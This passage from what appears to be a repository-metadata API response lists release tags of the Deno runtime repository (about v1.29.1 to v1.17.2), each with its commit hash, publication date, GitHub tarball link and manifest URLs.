api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c